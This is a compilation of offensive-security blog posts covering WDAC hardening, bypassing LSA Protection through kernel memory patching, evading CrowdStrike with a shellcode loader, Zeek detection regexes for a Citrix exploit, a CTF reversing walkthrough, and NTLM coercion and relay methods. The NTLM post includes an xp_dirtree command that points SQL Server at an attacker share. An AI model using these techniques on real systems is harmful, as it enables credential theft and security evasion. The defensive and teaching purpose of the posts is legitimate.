
Upgrading from AppLocker to Windows Defender Application Control (WDAC)

8/30/2020

Windows Defender Application Control (WDAC), formerly known as Device Guard, is a Microsoft Windows security feature that restricts executable code, including scripts run by enlightened Windows script hosts, to code that conforms to the device code integrity policy. WDAC prevents the loading and execution of unwanted or malicious code, drivers and scripts. WDAC also provides extensive event auditing capability that can be used to detect attacks and malicious behaviour.

​Configuring WDAC

WDAC works on all versions of Windows; however, prior to Windows 10 version 2004 only Windows 10 Enterprise had the capability to create policies. I used Windows 10 Professional version 2004 to create this blog post. On a supported OS version you can deploy the default Windows WDAC audit policy with the command:
ConvertFrom-CIPolicy -XmlFilePath C:\Windows\schemas\CodeIntegrity\ExamplePolicies\DefaultWindows_Audit.xml -BinaryFilePath C:\Windows\System32\CodeIntegrity\SIPolicy.p7b
The DefaultWindows_Audit.xml is a reference policy supplied by Microsoft that can be used as the base to build a more customized policy. The DefaultWindows_Audit.xml is designed to only allow the base operating system, including WHQL-approved drivers and anything in the Microsoft App Store. The AllowMicrosoft.xml policy would allow all Microsoft-signed code and applications, such as Office, Teams, Visual Studio and Sysinternals, which I personally consider too permissive.
An important distinction should be made between Windows and Microsoft signed code: Windows refers to the base operating system, while Microsoft refers to any code signed by Microsoft. The Get-AuthenticodeSignature cmdlet can be used to determine if a binary is part of the base operating system.
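For example, inspecting a binary that ships with the operating system should show a signer certificate issued to Microsoft Windows rather than Microsoft Corporation (the path below is just a convenient example):

$sig = Get-AuthenticodeSignature C:\Windows\System32\services.exe   # any base OS binary will do
$sig.Status
$sig.SignerCertificate.Subject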
After enabling the DefaultWindows_Audit.xml policy with the above command and rebooting, the event log can be used to inspect code integrity violations. The events will be stored in the Applications and Services Logs > Microsoft > Windows > CodeIntegrity > Operational log. Event ID 3076 represents a code integrity violation in audit mode. These events will be followed by at least one Event ID 3089, which provides further information regarding the signature of the binary in violation. The 3076 and 3089 events can be correlated through the Correlation ActivityID viewable within the raw XML.
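A quick way to pull these events out for review is with Get-WinEvent:

# List recent audit-mode violations (3076) together with their signature details (3089)
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-CodeIntegrity/Operational'; Id = 3076, 3089 } -MaxEvents 50 |
    Select-Object TimeCreated, Id, Message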
The example Event ID 3076 below shows that services.exe loaded mysql.exe, which did not meet the code integrity policy.
This violation produced two 3089 events, as is evident from the TotalSignatureCount of 2. The first, Signature 0, displayed below, shows that mysql.exe had a digital signature from Oracle.
The last signature, which will always exist, is a hash of the binary generated by WDAC.

​Whitelisting Software

I’m going to demonstrate creating a code integrity policy for Chrome, 7-Zip and Sublime Text 3. First, let's examine the Chrome executable files with the command:
Get-ChildItem -File -Recurse -Include *.exe, *.dll, *.sys | Get-AuthenticodeSignature
The results show that all of the Google Chrome executable files are signed with a valid signature.
The Chrome policy can be built based on the Publisher using the commands:
$SignerInfo = Get-SystemDriver -ScanPath . -NoScript -NoShadowCopy -UserPEs
New-CIPolicy -FilePath Chrome.xml -DriverFiles $SignerInfo -Level Publisher
The name of the cmdlet Get-SystemDriver is misleading, since it's also designed to collect the information needed for user mode policies, and is not exclusive to drivers. The information from Get-SystemDriver is then used to create a new policy based on the Publisher level.
The rule level specified in the Level parameter is extremely important and specifies how code is authorized. The Publisher level is a combination of the PcaCertificate level (typically one certificate below the root) and the common name (CN) of the leaf certificate. This rule level allows organizations to trust a certificate from a major CA, but only if the leaf certificate is from a specific company (such as Google LLC). This is lenient in contrast to the Hash or FilePublisher levels, but it reduces the maintenance overhead, as it allows Chrome to update itself, and even add new files, which will continue to be trusted as long as they are signed with the same certificate. The full list of rule levels is part of the WDAC documentation.
While performing the same process on 7-Zip I discovered that none of the executable files are signed. In this instance, I could create a policy that whitelists each file using the Hash rule level, which “specifies individual hash values for each discovered binary”. I have opted for the less secure approach of whitelisting the 7-Zip folder to demonstrate feature parity with AppLocker.
$rules = New-CIPolicyRule -FilePathRule "C:\Program Files\7-Zip\*"
New-CIPolicy -FilePath C:\Users\acebond\Documents\7-Zip.xml -Rules $rules
The 7-Zip code integrity policy is based on the FilePathRule and allows all code in the 7-Zip Program Files directory. The wildcard placed at the end of the path authorizes all files in that path and subdirectories recursively.
Sublime Text 3 contained a mixture of signed and unsigned files.
In this instance, the Fallback parameter can be used to specify a secondary rule level for executables that do not meet the primary trust level specified in the Level parameter. I chose to trust the Sublime Text 3 files based on the FilePublisher level, which is a combination of the FileName attribute of the signed file plus the Publisher. Files that cannot meet the FilePublisher trust level, such as python33.dll, will be trusted based on the Hash rule level.
$SignerInfo = Get-SystemDriver -ScanPath . -NoScript -NoShadowCopy -UserPEs
New-CIPolicy -FilePath Sublime_Text.xml -DriverFiles $SignerInfo -Level FilePublisher -Fallback Hash
These 3 new policies can be merged into the base DefaultWindows_Audit.xml policy to whitelist Chrome, 7-Zip and Sublime Text 3. In the screenshot below I have merged all 4 policies. A quick note that Merge-CIPolicy uses the first policy specified in the PolicyPaths as the base, and does not merge policy rule options.
I have chosen to live dangerously and removed rule option 3 (Enabled:Audit Mode) so the policy executes in enforcement mode.
Copy-Item "C:\Windows\schemas\CodeIntegrity\ExamplePolicies\DefaultWindows_Audit.xml" .
Merge-CIPolicy -OutputFilePath Desktop.xml -PolicyPaths .\DefaultWindows_Audit.xml, .\Chrome.xml, .\7-Zip.xml, .\Sublime_Text.xml
Set-RuleOption -FilePath .\Desktop.xml -Option 3 -Delete
ConvertFrom-CIPolicy -XmlFilePath .\Desktop.xml -BinaryFilePath C:\Windows\System32\CodeIntegrity\SIPolicy.p7b
The new policy allows Chrome, 7-Zip and Sublime Text 3 and blocks all other software from running.

​Bypassing WDAC?

WDAC is a security boundary that cannot be bypassed without an exploit.  The only practical method to bypass WDAC is to find a misconfiguration within the organisation policy. This could be a whitelisted folder, certificate authority, or software component.
The example policy created in this blog post contains a number of leniencies that can be leveraged to circumvent WDAC. Firstly, the 7-Zip policy allows all code within the 7-Zip Program Files directory. A privileged user could place files in this directory to bypass WDAC and execute arbitrary code. Generally, WDAC policies should never whitelist entire directories.
Secondly, Sublime Text 3 comes packaged with Python, which is a powerful interpreter that can be used to bootstrap the execution of arbitrary code. All software within a WDAC policy should be reviewed for scripting capabilities. The risk can either be accepted, the software removed, or in some cases the scripting functionality removed.
Lastly, the policy does not block a number of default applications built into the OS that allow the execution of arbitrary code. A list and policy to block these executables is maintained in the Microsoft recommended block rules.
To demonstrate, I’ve used the well-known MSBuild executable to execute a Cobalt Strike trojan and bypass the WDAC policy. The MSBuild.exe executable will load a number of libraries to compile and execute the code provided, but all of the executables and libraries involved are part of the base operating system and the code integrity policy. This is not a WDAC vulnerability, but rather a misconfiguration, in that the policy allows an executable that has the ability to execute arbitrary C# code. These are the types of executables that create holes in application whitelisting solutions.
The MSBuild bypass, and all Windows executables that bypass WDAC can be blocked by including the Microsoft recommended block rules in our WDAC policy. A number of these executables do have legitimate use cases, and I personally think the focus should be on monitoring and initial code execution methods, as running MSBuild.exe implies that an attacker already has the ability to execute commands on the system.
I saved the block rules as BlockRules.xml. If the policy is designed for a Windows 10 version below 1903, then you should also uncomment the appropriate versions of msxml3.dll, msxml6.dll, and jscript9.dll at lines 65 and 798. After deploying WDAC with the additional block rules, MSBuild can no longer be used as a bypass.
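Merging the block rules into the existing policy follows the same pattern as before (Desktop_Blocked.xml is just an arbitrary output name):

Merge-CIPolicy -OutputFilePath .\Desktop_Blocked.xml -PolicyPaths .\Desktop.xml, .\BlockRules.xml
ConvertFrom-CIPolicy -XmlFilePath .\Desktop_Blocked.xml -BinaryFilePath C:\Windows\System32\CodeIntegrity\SIPolicy.p7b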

​Benefits of WDAC

WDAC prevents a number of attack scenarios that other solutions cannot. The following advantages of WDAC are in comparison to AppLocker, although most will be true for any application whitelisting solution.
WDAC prevents DLL hijacking since only code that meets the code integrity policy will be loaded. This effectively mitigates all DLL hijacking attacks, since any planted DLLs will fail to load and will create an event log entry that should be investigated immediately.
Privileged file operation escalation of privilege vulnerabilities (for example CVE-2020-0668 and CVE-2020-1048) cannot be weaponized. These types of vulnerabilities use a privileged file operation primitive to create or replace a binary in a privileged folder such as System32. WDAC prevents the vulnerabilities from achieving code execution since new or replaced files would violate the code integrity policy.
WDAC can be applied to drivers which run in kernel mode. This prevents tradecraft that leverages loading a malicious driver to disable or circumvent security features. My previous blog on Bypassing LSA Protection could be prevented using WDAC although Credential Guard is a better solution.
Code integrity policies can be applied and enforced even on administrative or privileged users. With a solution like AppLocker, there are hundreds of methods an administrative user can use to circumvent, hinder or disable the functionality. A correctly configured WDAC policy cannot be tampered with by an administrative user, even with physical access. This can be achieved with Hypervisor-Protected Code Integrity (HVCI), Secure Boot, BitLocker and disabling the policy rules Unsigned System Integrity Policy and Advanced Boot Options Menu.
WDAC is a security feature built on security boundaries that are guaranteed to be serviced by Microsoft. AppLocker is great, but it's designed to help users avoid running unapproved software; it is not designed as a security feature.
Getting initial code execution on an endpoint device is one of the most difficult phases during a red team engagement. As such, malicious or unintended code execution on a device should be treated as a security boundary. Preventing code execution from taking place in the first instance is one of the best defensive actions that can be implemented within an organisation.

Bypassing LSA Protection (aka Protected Process Light) without Mimikatz on Windows 10

7/6/2020

Starting with Windows 8.1 (and Server 2012 R2) Microsoft introduced a feature termed LSA Protection. This feature is based on the Protected Process Light (PPL) technology which is a defense-in-depth security feature that is designed to “prevent non-administrative non-PPL processes from accessing or tampering with code and data in a PPL process via open process functions”.

I’ve noticed there is a common misconception that LSA Protection prevents attacks that leverage SeDebug or Administrative privileges to extract credential material from memory, like Mimikatz. LSA Protection does NOT protect from these attacks, at best it makes them slightly more difficult as an extra step needs to be performed.


To bypass LSA Protection you have a few options:
  1. Remove the RunAsPPL registry key and reboot (probably the worst method since you’ll lose any credentials in memory)
  2. Disable PPL flags on the LSASS process by patching the EPROCESS kernel structure
  3. Read the LSASS process memory contents directly instead of using the open process functions

The latter two methods require the ability to read and write kernel memory. The easiest way to achieve this is by loading a driver. Although you could create your own, I’ve decided to leverage the RTCore64.sys driver from the product MSI Afterburner. I chose this driver because it's signed and allows reading and writing arbitrary memory, thanks MSI.


I decided to implement the 2nd method, since removing the PPL flags allows the use of already established tools like Mimikatz to dump the credential material from LSASS. To do this we need to find the address of the LSASS EPROCESS structure and patch five values to zero: SignatureLevel, SectionSignatureLevel, Type, Audit, and Signer.

The EnumDeviceDrivers function can be used to leak the kernel base address. This can be used to locate the PsInitialSystemProcess which points to the EPROCESS structure for the system process. Since the kernel stores processes in a linked list, the ActiveProcessLinks member of the EPROCESS structure can be used to iterate the linked list and find LSASS.
Figure 1 - Code to find the LSASS EPROCESS structure
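The tool itself does this in C/C++, but the kernel base leak can be sketched from an elevated PowerShell prompt (an illustrative snippet, not code from the tool; the first address returned is normally ntoskrnl.exe):

Add-Type -Namespace Native -Name Psapi -MemberDefinition @'
[DllImport("psapi.dll", SetLastError = true)]
public static extern bool EnumDeviceDrivers([Out] System.IntPtr[] ddAddresses, uint arraySize, out uint bytesNeeded);
'@

[uint32]$needed = 0
[Native.Psapi]::EnumDeviceDrivers($null, 0, [ref]$needed) | Out-Null      # first call just sizes the array
$bases = New-Object 'System.IntPtr[]' ([int]($needed / [System.IntPtr]::Size))
[Native.Psapi]::EnumDeviceDrivers($bases, $needed, [ref]$needed) | Out-Null
'Kernel base: 0x{0:X}' -f $bases[0].ToInt64()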
If we look at the EPROCESS structure (see Figure 2 below) we can see that the 5 fields we need to patch are all conveniently aligned into a contiguous 4 bytes. This lets us patch the EPROCESS structure with a single 4-byte write like so:
​
WriteMemoryPrimitive(Device, 4, CurrentProcessAddress + SignatureLevelOffset, 0x00);
Figure 2 - EPROCESS structure offsets on Windows 1909
Now that the PPL has been removed, all the traditional methods of dumping LSASS will work, such as Mimikatz, the MiniDumpWriteDump API call, etc.
The tool to perform this attack, written in C/C++, can be found on GitHub. I’ve only tested it on Windows 10 versions 1903, 1909 and 2004. It should work on all versions of Windows since the feature was introduced, but I’ve only implemented the offsets for those versions.

Using Zeek to detect exploitation of Citrix CVE-2019-19781

7/6/2020


Using the tool

Zeek, formerly known as Bro, is a high-level packet analysis program. It originally began development in the 1990s and has a long history. It does not directly intercept or modify traffic; rather, it passively observes traffic and creates high-level network logs. It can be used in conjunction with a SIEM to allow quick analysis. It can operate in real time to create logs of a currently active system, or as a post-mortem analysis tool for a packet capture. It can also work with pf_ring, via a well-supported plugin, to increase network capture performance.

Creating a script

While Zeek does have some good documentation online, it is definitely lacking in any sort of tutorial-based content for beginners. This is especially true for anyone who wants to try their hand at using the Zeek scripting language to create a custom plugin.

A simplified understanding of what a signature detection based zeek plugin has to do is:

  1. Define the log format and alert types for the plugin
  2. Define the signatures for detection
  3. Initialize zeek to include a new LogStream
  4. Create an event listener that matches your packets protocol

CVE-2019-19781 signatures

Between the patterns defined in this YARA rule and the US-CERT alert, a pattern can be constructed. In this case, the following regex patterns will be used to match malicious URIs:

.*\/\.\.\/vpns\/.*
.*\/vpns\/.*
.*\/vpns\/cfg\/smb.conf
.*\/vpns\/portal\/scripts\/newbm\.pl.*
.*\/vpns\/portal\/scripts\/rmbm\.pl.*
.*\/vpns\/portal\/scripts\/picktheme\.pl.*

Importing necessary protocols and defining the module

Here we define the module as NETSCALARD, although a CVE number would have been just as appropriate.

@load base/protocols/http
@load base/frameworks/notice

module NETSCALARD;

Defining log file

To define the log file there needs to be a log identifier, in this case a NETSCALARD::LOG is used, and a record entry for how the data should be recorded into the file.

export {
    ## The logging stream identifier.
    redef enum Log::ID += { LOG };

    ## The record type which contains column fields of the certificate log.
    type Info: record {
        src:         addr   &log;
        dst:         addr   &log;
        ## Timestamp when this record is written.
        ts:          time   &log;
        ## URI of request
        URI:         string &log;
    };
    # cont.
}

Defining notice type

Zeek allows plugins to define a different Notice type that can be used when generating emails. There are a lot of pre-defined notices that can be used and they are indexed here.

export {
    # cont.
    redef enum Notice::Type += {
        Netscalar_Attack,
    };
    # cont.
}

Defining signatures

Zeek provides a pattern type that can be used to quickly define multiple regex patterns. The language also has some pattern specific operations such as in which can check if a pattern is found in a string.

export {
    # cont.
    const match_bad_signatures =
          /.*\.\.\/vpns\/.*/
        | /.*vpns\/cfg\/smb.conf/
        | /.*vpns\/portal\/scripts\/newbm\.pl/
        | /.*vpns\/portal\/scripts\/rmbm\.pl/
        | /.*vpns\/portal\/scripts\/picktheme\.pl/ &redef;
}

Initializing Zeek

When initializing zeek there are a few different methods of recording events. In this case a dedicated log file was chosen. To create this log stream based on the log specifications Log::create_stream can be used.

event zeek_init() &priority=3 {
    Log::create_stream(NETSCALARD::LOG, [$columns=Info, $path="netscalard-attacks"]);
}

Creating an event listener

The netscalard exploit uses a POST request to one of the defined bad URIs. To match this pattern effectively, and to avoid the encumbrance of checking every request, the code quickly returns for packets that are not a POST request or that don’t match one of the defined signatures. The remaining packets, the malicious packets, can be recorded. To record the attack, the code creates a notice that will be placed in notice.log, as well as a dedicated log entry for the netscalard-attacks log file.

event http_request(c: connection, method: string, original_URI: string,
        unescaped_URI: string, version: string) &priority=3 {

    if (!( method == "POST" ))
        return;

    if (!( match_bad_signatures in unescaped_URI ))
        return;

    NOTICE([
        $note=Netscalar_Attack,
        $msg=fmt("Netscalar attack attempt made by (%s) against (%s)", c$id$orig_h, c$id$resp_h),
        $sub=cat(c$id$orig_h,c$id$resp_h,unescaped_URI)
    ]);

    Log::write(
        NETSCALARD::LOG,
        Info(
            $src=c$id$orig_h,
            $dst=c$id$resp_h,
            $ts=network_time(),
            $URI=unescaped_URI
        )
    );
}

Output

After running this script against the local interface for testing with the following command:

sudo zeek -C -i lo ../detect-netscalard.zeek

Some log files are generated. Once a malicious packet has been detected, in this case triggered from a curl command, a new notice.log file and netscalard-attacks.log will be generated. The notice file can be fed into zeek-cut to extract the important information.

> $ cat notice.log | zeek-cut -d note msg
NETSCALARD::Netscalar_Attack    Netscalar attack attempt made by (127.0.0.1) against (127.0.0.1)
NETSCALARD::Netscalar_Attack    Netscalar attack attempt made by (127.0.0.1) against (127.0.0.1)
NETSCALARD::Netscalar_Attack    Netscalar attack attempt made by (127.0.0.1) against (127.0.0.1)
NETSCALARD::Netscalar_Attack    Netscalar attack attempt made by (127.0.0.1) against (127.0.0.1)
NETSCALARD::Netscalar_Attack    Netscalar attack attempt made by (127.0.0.1) against (127.0.0.1)
> $ cat netscalard-attacks.log
#fields src dst ts  URI
#types  addr    addr    time    string
127.0.0.1   127.0.0.1   1593933273.086046   /vpns/portal/scripts/newbm.pl
127.0.0.1   127.0.0.1   1593933273.486067   /vpns/portal/scripts/newbm.pl
127.0.0.1   127.0.0.1   1593933273.799568   /vpns/portal/scripts/newbm.pl
127.0.0.1   127.0.0.1   1593933274.093156   /vpns/portal/scripts/newbm.pl
127.0.0.1   127.0.0.1   1593933274.371653   /vpns/portal/scripts/newbm.pl
#close  2020-07-05-17-14-46

Using this plugin, post-mortem analysis can also be performed. An example command for this is shown below:

sudo zeek ../detect-netscalard.zeek -r packetcapture.pcap

Bypassing CrowdStrike Endpoint Detection and Response

6/29/2020

In a recent engagement I had to compromise a hardened desktop running CrowdStrike and Symantec Endpoint Protection. The initial code execution method was my reliable favorite MSBuild (C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe) which could be leveraged to execute C# code as an inline task.
​
Initially I wrote a very basic loader that used a bruteforce decryption algorithm to run a Cobalt Strike beacon using VirtualAlloc and CreateThread.
The shellcode was stored encrypted within the C# code and decrypted using a multi-byte XOR key with the last 3 bytes removed. The while loop continuously increments the decryption key, performs the XOR decryption and hashes the decrypted payload until the hash of the decrypted shellcode matches its original hash value. This method prevents antivirus or snooping eyes from easily reading the shellcode, and in fact no antivirus product would spend the amount of time required to decrypt the shellcode even if it knew how to run C# code in MSBuild project files.

CrowdStrike detected and prevented the VirtualAlloc/CreateThread method and classified it as “Process Hollowing”.
I'd never seen that technique detected before, but had been waiting for the day. I knew I’d have to take CrowdStrike seriously and wrote a new loader that used the same decryption routine but now executed code using the undocumented NtMapViewOfSection and NtQueueApcThread functions.

The NtMapViewOfSection routine maps a view of a section object into the virtual address space of a subject process.

The NtQueueApcThread routine adds a user-mode asynchronous procedure call (APC) object to the APC queue of the specified thread.
​
These methods are far less common, and considered more stealthy. The majority of the loader code was taken from the Sharp-Suite UrbanBishop POC (https://github.com/FuzzySecurity/Sharp-Suite) which implemented exactly what I wanted. I updated the POC slightly to support inline shellcode and automatic process selection for the injection.
The loader now successfully bypassed the CrowdStrike prevention rules. The use of MSBuild did trigger a detection alert in this particular configuration, which was unfortunately unavoidable unless a different initial code execution method was used. The detection was only an alert, not a prevention, which meant the shell was allowed to live.
The loader does create a suspended thread in the remote process to queue the APC on. This can be avoided by selecting an already existing thread; however, the thread needs to enter or be in an alertable state for the APC to execute, and picking the wrong thread can impact the stability of the remote process. The trade-off for that extra bit of stealth did not seem worthwhile, but I figured I'd mention it for anyone writing detections.

Introduction to Cutter

5/22/2020


Introduction to Cutter

Cutter is a Graphical User Interface (GUI) built around the long-lived radare2 disassembler. The largest problem with radare2 is its usability. While radare2 is efficient to use once mastered, it has many problems for first-time users. Running pdf to ‘print disassembled function’ or aaa to ‘analyze and auto-name all functions’ might seem intuitive to long-time users, but the tool's overall lack of user-friendly guides has stunted its usage growth.

Cutter has succeeded in porting radare's fantastic capability into a graphical interface that can compete with the likes of Hopper, IDA, BinaryNinja and Ghidra all while remaining completely free. It also has the added benefit of being multi-platform.

The General Interface

Opening a Binary

When Cutter first launches you are presented with the menu below, which provides a short history of previously opened files, as well as a way to select files from disk.


Analysis level

In radare2, there are different analysis levels that can be appropriate for different circumstances. Since most CTF binaries are usually relatively small, the default option works fine.

Getting a graph view

Once inside the Cutter project view, the different panes let you quickly see the various parts of the code, and all panes can be resized, moved or closed at will. One of these views in particular, the graph view, is very reminiscent of BinaryNinja and contains the logical flow of the program. When clicking through the different functions in the functions panel, the hexdump, disassembly, decompiler and graph views will all be updated in real time. My personal favourite layout when trying to figure out different sections of the code is the functions on the left, the graph view in the middle and the decompiler on the right.


Completing a basic PicoCTF Challenge

To show the basic functionality and usage of the tool I will quickly run through a picoCTF reversing challenge from 2018 titled “be quick or be dead 1”.

Executing the binary

The first step is to investigate the binary to see what file type it is, and then execute it.


Since this is an ELF binary I can run it in my linux environment after giving it the executable flag with chmod +x be-quick-or-be-dead.


Opening it with Cutter

Now that we know the binary has some sort of check preventing us from receiving the flag, we can open it up with cutter.

When opening it I use the default analysis level.


Once Cutter is open we are greeted with a lot of information. From this default view we can quickly see some functionality that will be useful. On the left side of the screen we can see all the defined functions in the binary, such as main and print_flag. In the center we can see some useful information about the binary, such as the fact that it is an ELF binary. At the bottom we can see the different tab views available for analysing the binary.


Analysing the function calls

The first thing we want to do is analyse the main function. We can access the main function in the graph view simply by double-clicking it in the function listing panel. This reveals the graph view of the main function; normally the graph view would show different branches, but the main function simply calls four different functions then exits.


We can see the four different functions, and we can jump to each of their definitions by double clicking them.


In this case I clicked the print_flag function since it seems like the obvious choice.


Unfortunately we notice that there is a decrypt_flag function that is run, which probably relates to the main function's invocation of get_key. Since this function has no checks that would cause the binary to fail, I decided to take a different approach. When the binary initially ran it printed a message saying that a faster machine was needed, so I decided to look at the strings and see if I could locate that message.


This turned out to be a good choice, as we can locate the string and its address very easily.

By pressing x while highlighting this string, or right-clicking and choosing Show X-Refs (cross-references), we can see where this string is used in the code. In this case, it is used in a mov instruction in the alarm_handler function.


Looking at this function we can see that it calls puts on our string, and then immediately exits. We can find where this function is referenced by going to the functions panel on the left and pressing x again, or right-clicking and choosing Show X-Refs. This will lead us closer to our culprit. In this case we can see that the function is only referenced in the set_timer function.

We can now try to understand the functionality of the set_timer function to figure out why our program ends abruptly. We can also see Cutter's branching come into play in this function, as it uses a jne (jump if not equal) instruction to check whether an error code is raised after calling __sysv_signal.


Now that we have found our culprit function, we can look into how exactly it works. A useful tool when trying to figure out the functionality of some machine code is a decompiler. Cutter actually comes with a C++ rewrite of the Ghidra decompiler, as well as its own RetDec. We can enable this decompiler view by going to the top bar and clicking Windows -> Decompiler.


This decompiler view allows us to more readily understand the set_timer function.

We can see that the function makes two significant calls, one to __sysv_signal and the other to alarm. To understand these functions I like to use man pages.

The two pages I used for this analysis are:

  • Man Page for signal
  • Man Page for alarm

From this I was able to infer three important pieces of information.

__sysv_signal is used to set a function to be called when a specific signal is sent inside the binary.

0xe, or 14, refers to SIGALRM.

alarm will send SIGALRM after a given number of seconds.

So in this case the function will:

  • Set alarm_handler to run when the binary sends SIGALRM
  • Set the binary to send SIGALRM after 1 second.

So by removing the call to alarm from the binary, alarm_handler should never be hit and the binary should finish running as expected.

Patching the binary with NOPs

When patching the binary it is important to remember that you are changing the binary on disk, and that it is wise to create copies of the binary in its original state. What we want to do in this case is change the call to alarm to a NOP (no operation) instruction so that the binary will not terminate prematurely. We can do this by right-clicking the call to alarm in either the disassembly, graph or decompiler view and choosing Edit -> Nop Instruction. I personally recommend doing this through the graph or disassembly view to ensure the correct instruction is NOP’d.


Getting the flag

Now that alarm is never called, we can close Cutter, run the binary, and we should get the flag.


There are definitely a couple of other ways we could have solved this challenge, and some unanswered questions remain.

  • Why was the binary taking so long to run?
  • What happens if we NOP the call to set_timer?
  • Can we use a debugger to ignore SIGALRM? (GDB will do this by default).

All in all, Cutter is a solid tool that is built on a well-maintained project, and it should see continual improvements into the future.


Capturing and Relaying NTLM Authentication: Methods and Techniques

5/14/2020

This blog post will provide an overview of the methods available to force NTLM authentication to a rogue server, and capture or relay the credential material. These attacks can be leveraged to escalate privileges within an Active Directory domain environment. I like to look at these attacks as having 3 stages which are:
  1. Positioning a rogue authentication server so that it is accessible by the victims’ endpoint;
  2. Persuading the victim user or OS into authenticating to the rogue server; and lastly
  3. Relaying or cracking the obtained credential material.

​Stage 1: The Rogue Server

The rogue authentication server can be a compromised endpoint, network implant or Internet based server. This will largely depend on the type of engagement (Red Team, Internal Penetration Test, Phishing, etc) and your current privileges within the network.

Generally speaking, a network implant (which could just be your laptop) will be the easiest and most flexible option. A compromised endpoint will mean dealing with the local firewall and antivirus; this rarely prevents the attack, but will create extra caveats. An Internet-based server will only work if outbound SMB and/or WebDAV is allowed, and will often limit relay options.

There are 4 open source tools that can be used to create a rogue authentication server. These are:
  • https://github.com/lgandx/Responder
  • https://github.com/SecureAuthCorp/impacket
  • https://github.com/Kevin-Robertson/Inveigh
  • https://github.com/Kevin-Robertson/InveighZero
​
Responder and Impacket (specifically the ntlmrelayx script) are written in Python and work best on Linux; Inveigh is written in PowerShell and designed for Windows hosts; InveighZero is written in C# and also designed for Windows hosts. These tools are all part of toolkits that provide more features than just a rogue authentication server, and I’ll discuss these features in the following sections.

Stage 2: Coerced Authentication​

This is the hardest part of the attack, and can often require a good level of creativity. The objective is to coerce a user or machine into authenticating to the rogue authentication server using NTLM authentication, which, fortunately for us, is supported by a large number of common protocols (such as SMB, HTTP, RDP and LDAP). The most popular method would be LLMNR/NBT-NS/mDNS poisoning, which I’ll discuss first, but there is an array of good options available.

Link-Local Multicast Name Resolution (LLMNR), NetBIOS Name Service (NBT-NS) and Multicast DNS (mDNS) are name resolution services that are built into Windows and enabled by default. LLMNR/NBT-NS/mDNS poisoning attacks leverage the fact that Windows will assume everyone on the network is trusted. This allows an attacker to respond to legitimate queries with the rogue authentication server's IP address. Since Windows is generally performing name resolution with the intent of connecting to the server, this causes machines throughout the network to authenticate to the rogue server. All the tools mentioned above except Impacket have name spoofing capabilities built in.

The same principle discussed in the above name resolution attacks applies to the link layer Address Resolution Protocol (ARP). ARP poisoning can be leveraged to convince targeted victims that the rogue server is actually the file server, the Domain Controller, or any legitimate server that already exists within the network. This can lead to the victim authenticating to the rogue server instead of the legitimate server it initially intended to communicate with.

There are a number of file types that, when parsed by Windows Explorer, will cause the download of a remote resource. This remote resource can be a file that requires NTLM authentication, which Windows will perform automatically and without user interaction. These file types are SCF, LNK and URL. By putting these files into a network share, with a filename that causes them to be displayed at the top of the directory listing for added effect, visitors will automatically authenticate to the rogue server. Mileage may vary, as Windows 10 seems to have removed this “feature”, at the very least for SCF files.

Phishing or backdooring files for NTLM authentication is another common method. PDF, Microsoft Word and Microsoft Access files can be crafted to cause an NTLM authentication request when opened. These file types all support embedding external content that will be automatically fetched by the respective program. An attacker can leverage this functionality to coerce authentication requests. I doubt that list is exhaustive and encourage you to research the types of files used on the network for UNC path injection opportunities.

Security researchers have discovered vulnerabilities within Microsoft software that allow an attacker to force a target machine into performing NTLM authentication with an arbitrary host. The SpoolSample vulnerability by Lee Christensen uses the Print System Remote Protocol (MS-RPRN) interface to request that a server send updates to an arbitrary host regarding the status of print jobs. This can be used to coerce any machine running the service into authenticating to any other machine. This method is so powerful it can be leveraged to move laterally through Active Directory forests.

A ZDI researcher discovered the ability to make Exchange authenticate to an arbitrary URL over HTTP via the Exchange PushSubscription feature. This attack was called PrivExchange and could often be used to escalate to Domain Admin given the excessive privileges held by the Exchange servers group. Both of these issues were initially considered intended behaviour by Microsoft but were later patched due to the security consequences. However, I still come across vulnerable Windows and Exchange servers on internal networks, so these methods remain very useful.

There are a few MS-SQL stored procedures that can be leveraged for NTLM authentication. These can be useful when you have the ability to execute SQL queries on an MS-SQL server through compromised credentials, privilege misconfigurations, or an SQL injection vulnerability. The stored procedures xp_dirtree and xp_fileexist can be used with a UNC path to cause the SQL service account to perform an SMB connection and NTLM authentication request.
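For example, with the SqlServer PowerShell module and valid credentials, a single query is enough to trigger the outbound authentication (the server name and UNC path below are placeholders):

# xp_dirtree makes the SQL Server service account enumerate the attacker's share over SMB
Invoke-Sqlcmd -ServerInstance 'sql01.corp.local' -Query "EXEC master..xp_dirtree '\\10.0.0.99\share';"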

Stale Network Address Configurations (SNACs) are misconfigurations whereby a server is trying to connect to an IP address that no longer exists within the network. IP aliasing can be used to assign the stale IP address to a network interface on an attacker controlled device to receive the traffic from the misconfigured server. One of the possible outcomes is that the server will connect using a protocol that supports NTLM authentication, and respond to authentication requirements. The tool Eavesarp can help discover these misconfigurations.

​
By default Windows has IPv6 enabled and will periodically request an IPv6 address using DHCPv6. If IPv6 is not used within the internal network, and has not been disabled, then an attacker can stand up a DHCPv6 server. The malicious DHCPv6 server can be used to assign link-local IPv6 addresses and configure the default DNS server. Since IPv6 takes precedence over IPv4, the attacker now controls DNS lookups and can selectively poison queries to force victims into connecting to a rogue authentication server.

​Stage 3.1 : Cracking the Hash

This section requires understanding the basics of the NTLM authentication protocol. NTLM authentication is a challenge-response protocol: a client connecting to a server is presented with a challenge (in NTLMv1 this is an 8-byte random number), and the client must encrypt the challenge value with its NTLM password hash and return the result to the server for verification. The server is then responsible for validating the encrypted value using its local Security Account Manager (SAM) database or with the help of a Domain Controller. The validation is performed by carrying out the same encryption operation and checking that the client's response matches.

In the event a client performs NTLM authentication with a rogue authentication server, the same process described above takes place. This allows the attacker to obtain a value encrypted with the NTLM hash of the user who authenticated. This key material is effectively a hash that can be brute forced to disclose the user's plaintext password.

The brute force process reads a password from a wordlist, converts it to an NTLM hash, encrypts the challenge with the NTLM hash (creating a challenge response) and checks if it matches the challenge response received from the victim to determine if the guessed password is correct.
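For NTLMv2 the check itself boils down to two HMAC-MD5 operations; the sketch below is illustrative only (the variables are assumed inputs, and turning a candidate password into an NT hash additionally requires MD4, which is omitted here):

# Assumed inputs: $NtHash (MD4 of the UTF-16LE candidate password), $User, $Domain,
# $ServerChallenge (8 bytes from the rogue server), $NtProofStr (first 16 bytes of the
# captured NTLMv2 response) and $Blob (the remainder of the response)
$hmac1     = [System.Security.Cryptography.HMACMD5]::new($NtHash)
$ntlmv2Key = $hmac1.ComputeHash([System.Text.Encoding]::Unicode.GetBytes($User.ToUpper() + $Domain))
$hmac2     = [System.Security.Cryptography.HMACMD5]::new($ntlmv2Key)
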